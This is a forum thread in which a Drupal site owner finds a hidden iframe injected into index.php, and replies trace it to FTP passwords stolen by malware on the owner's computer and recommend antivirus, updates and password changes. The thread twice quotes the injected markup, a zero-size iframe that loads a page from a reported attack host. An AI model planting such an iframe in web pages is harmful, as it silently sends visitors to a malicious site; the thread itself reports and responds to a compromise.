Jump to content

[SOLVED] Is it my website being hacked?


Recommended Posts



My website was being syntax error when this morning I wake up.

I found out that my index.php in www folder got this line

<iframe frameborder="0" onload="if (!this.src){ this.src='http://iqsp.ru:8080/index.php'; this.height='0'; this.width='0';}" >tlimbgnxscyelhhuuqhvchjqcghsbyt</iframe>

After that I go to this website


It is a reported attack website.


Is there any possible way to know why was this happened?

Someone can access to my index.php?

Link to comment
Share on other sites

Many ways this could happen.


We had an attack here at work the other week where someone had written javascript to our database creating a XSS attack via an SQL injection.


Is this line of javascript actually hard coded into your index.php file or does it come from your database?

Link to comment
Share on other sites

Hi thanks for reply,


I am using drupal and I have download the drupal module only.

It is hardcoded in my index.php

Because in drupal index.php

after they open a php tag they didnt close it.

my index.php looks like this

require_once './includes/bootstrap.inc';

$return = menu_execute_active_handler();

// Menu status constants are integers; page content is a string.
if (is_int($return)) {
  switch ($return) {
    case MENU_NOT_FOUND:
elseif (isset($return)) {
  // Print any value (including an empty string) except NULL or undefined:
  print theme('page', $return);


<iframe frameborder="0" onload="if (!this.src){ this.src='http://iqsp.ru:8080/index.php'; this.height='0'; this.width='0';}" >tlimbgnxscyelhhuuqhvchjqcghsbyt</iframe>


So they insert the iframe in last line.

So it will causing syntax error. because no close php tag and there is nothing call <iframe in php

Link to comment
Share on other sites

Anyone have any idea to deal with this?

It is not sql injection neither javascript XSS but it is permanently hard coded into my index.php

my index.php permission was set to 664 only.


what can done so or they  use php or anything else to do that?

either they hacked into my other script and rewrite my index.php?




Link to comment
Share on other sites

Its looks like my personal computer infected by virus.

According to my hosting provider said,


Your personal computer is most probably affected.

Yes, the virus is getting the password from your local computer.

Yes, the files listed above have been modified over FTP.


I am really weak with the security part.

So could the virus stole my ftp password inside my computer?

I am using filezilla and editplus.

So is this called phishing?

Link to comment
Share on other sites

Ok, the important part of what they said is "the files listed have been modified over FTP".  That means access was made using your username and password.


Have you got antivirus software installed?  If not, you should install that.


You should also make sure your computer has all the automatic updates from Windows Update.


If you have trouble cleaning the virus, it's best if you go to a forum that specializes in these things.


And of course you should change your password :)  Change it now, and then change it again after you're sure there's no viruses left on your computer.

Link to comment
Share on other sites

This thread is more than a year old. Are you sure you have something important to add to it?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.